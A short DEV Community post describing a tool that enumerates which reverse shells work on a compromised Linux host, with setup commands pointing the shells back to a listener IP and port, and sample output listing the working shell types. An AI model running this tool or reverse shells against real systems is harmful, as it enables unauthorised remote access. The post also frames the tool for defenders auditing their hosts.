DEV Community

Cover image for Reverse Shell Enumeration
fx2301
fx2301

Posted on

Reverse Shell Enumeration

Why?

You're a defender wanting to audit to see which reverse shells work out of the box on a particular host. Or, you're a lazy attacker wanting to quickly determine which reverse shells will work.

When?

You have remote code execution on a Linux host, and the noise this enumeration generates is not an operational concern.

How?

  1. Clone the repo:
git clone https://github.com/fx2301/reverseshellenum.git
cd reverseshellenum
Enter fullscreen mode Exit fullscreen mode
  1. Generate yourself a fresh script:
LHOST="10.10.0.123" LPORT=31373 python3 generate.py
Enter fullscreen mode Exit fullscreen mode
  1. Run the listener:
./listen.sh
Enter fullscreen mode Exit fullscreen mode
  1. Run the reverse shell enumerator on the target host:
./reverseshellenum.sh
Enter fullscreen mode Exit fullscreen mode
  1. Observe which shells work (refer to shells.json):
$ ./listen.sh
[i] Starting Reverse Shell Audit
  [+] Success: Bash -i
  [+] Success: Bash 196
  [+] Success: Bash read line
  [+] Success: Bash 5
  [+] Success: ncat -e
  [+] Success: Perl
  [+] Success: Perl no sh
  [+] Success: PHP Emoji
[i] Ending Reverse Shell Audit
Enter fullscreen mode Exit fullscreen mode

PR's welcome! Kudos to revshells.com for the raw material.

Top comments (0)